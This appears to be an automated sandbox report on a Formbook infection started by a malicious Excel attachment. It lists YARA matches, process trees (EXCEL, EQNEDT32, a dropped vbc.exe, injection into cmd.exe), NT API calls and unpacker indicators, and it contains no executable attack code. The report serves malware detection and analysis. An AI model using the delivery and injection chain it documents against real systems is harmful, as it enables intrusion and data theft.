            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E18B0
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E03E4
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E1BC2
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E04A8
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E07C6
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E0812
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E1951
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E9A50
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E9CA9
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E9CB8
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E2CF8
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E0D11
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00901B10
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00401030
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C95A
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C96E
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041D128
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C38D
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041BB9E
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00408C90
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402D8A
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402D90
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041BF8B
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402FB0
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008EE0C6
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0091D005
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0090905A
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008F3040
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008EE2E9
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00991238
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008EF3CF
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_009163DB
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008F2305
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008F7353
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0093A37B
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00925485
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00901489
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0090C5F0
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008F351F
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008F4680
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008FE6C1
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00992622
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0097579A
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008FC7BC
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0098F8EE
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008FC85C
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0091286D
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0099098E
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008F29B2
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_009069FE
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00975955
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022A1238
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021FE2E9
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02202305
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0224A37B
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02207353
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022A63BF
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021FF3CF
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022263DB
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0222D005
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02203040
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0221905A
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021FE0C6
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022A2622
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0224A634
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02204680
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0220E6C1
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0220C7BC
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0228579A
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022357C3
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0228443E
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0223D47D
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02235485
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02211489
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0220351F
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02246540
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0221C5F0
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022B3A83
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02227B00
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022ACBA4
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021FFBD7
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0228DBDA
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0222286D
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0220C85C
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0229F8EE
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0228394B
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02285955
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022029B2
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022A098E
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_022169FE
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02232E2F
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0221EE4C
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02210F3F
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0222DF7C
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0229CFB1
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02272FDC
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_02230D3B
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0220CD5B
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_0229FDDD
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DD128
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DC38D
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DC95A
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DC96E
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000DBB9E
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000C8C90
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000C2D8A
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000C2D90
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000C2FB0
            Source: C:\Users\Public\vbc.exe | Code function: String function 0095F970 appears 49 times
            Source: C:\Users\Public\vbc.exe | Code function: String function 0093373B appears 148 times
            Source: C:\Users\Public\vbc.exe | Code function: String function 00933F92 appears 66 times
            Source: C:\Users\Public\vbc.exe | Code function: String function 008EDF5C appears 71 times
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function 0226F970 appears 84 times
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function 021FDF5C appears 119 times
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function 021FE2A8 appears 38 times
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function 0224373B appears 245 times
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function 02243F92 appears 132 times
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004185F0 NtCreateFile
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004186A0 NtReadFile
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418720 NtClose
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004187D0 NtAllocateVirtualMemory
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418642 NtCreateFile
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041869D NtReadFile
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041871A NtClose
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004187CB NtAllocateVirtualMemory
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008E00C4 NtCreateFile,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008E0048 NtProtectVirtualMemory,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008E0078 NtResumeThread,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008E07AC NtCreateMutant,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DF9F0 NtClose,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DF900 NtReadFile,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DFBB8 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DFC90 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DFC60 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DFD8C NtDelayExecution,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DFEA0 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DFFB4 NtCreateSection,LdrInitializeThunk
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008E10D0 NtOpenProcessToken
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008E0060 NtQuerySection
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008E01D4 NtSetValueKey
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008E010C NtOpenDirectoryObject
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008E1148 NtOpenThread
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DF8CC NtWaitForSingleObject
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008DF938 NtWriteFile
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_008E1930 NtSetContextThread
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F00C4 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F07AC NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFB50 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EF900 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EF9F0 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFFB4 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFD8C NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F0048 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F0078 NtResumeThread
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F0060 NtQuerySection
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F10D0 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F010C NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F1148 NtOpenThread
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F01D4 NtSetValueKey
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFA20 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFA50 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFAB8 NtQueryValueKey
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFAD0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFBE8 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EF8CC NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EF938 NtWriteFile
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F1930 NtSetContextThread
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFE24 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFEA0 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFF34 NtQueueApcThread
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFFFC NtCreateProcessEx
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFC30 NtOpenProcess
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFC48 NtSetInformationFile
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F0C40 NtGetContextThread
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFC90 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021EFD5C NtEnumerateKey
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_021F1D80 NtSuspendThread
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D85F0 NtCreateFile
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D86A0 NtReadFile
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D8720 NtClose
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D8642 NtCreateFile
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D869D NtReadFile
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 7_2_000D871A NtClose
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
            Source: vbc.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: vbc[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: RFQ HCI20220113.xlsx | Virustotal: Detection: 33%
            Source: RFQ HCI20220113.xlsx | ReversingLabs: Detection: 30%
            Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$RFQ HCI20220113.xlsx
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRF028.tmp
            Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@7/18@9/8
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
            Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000002.520863272.0000000000A50000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483549508.0000000000740000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.482084370.00000000005E0000.00000004.00000001.sdmp, cmd.exe
            Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: vbc.exe.2.dr, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: vbc[1].exe.2.dr, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.vbc.exe.11a0000.2.unpack, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.2.unpack, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.6.unpack, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.8.unpack, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.1.unpack, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.vbc.exe.11a0000.4.unpack, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.10.unpack, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.3.unpack, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.11a0000.4.unpack, u0005u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_011A6167 push 3A000004h; retf 0000h 4_2_011A616C
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_011A642A push es; retf 4_2_011A6437
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_011A7296 push FFFFFFA1h; iretd 4_2_011A72A2
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_011A6AFF push es; iretd 4_2_011A6B51
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E6295 push edi; ret 4_2_002E6296
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EB630 pushfd ; ret 4_2_002EB631
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EB69C pushfd ; ret 4_2_002EB69E
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_002EB6E2 pushfd ; ret 4_2_002EB6E3
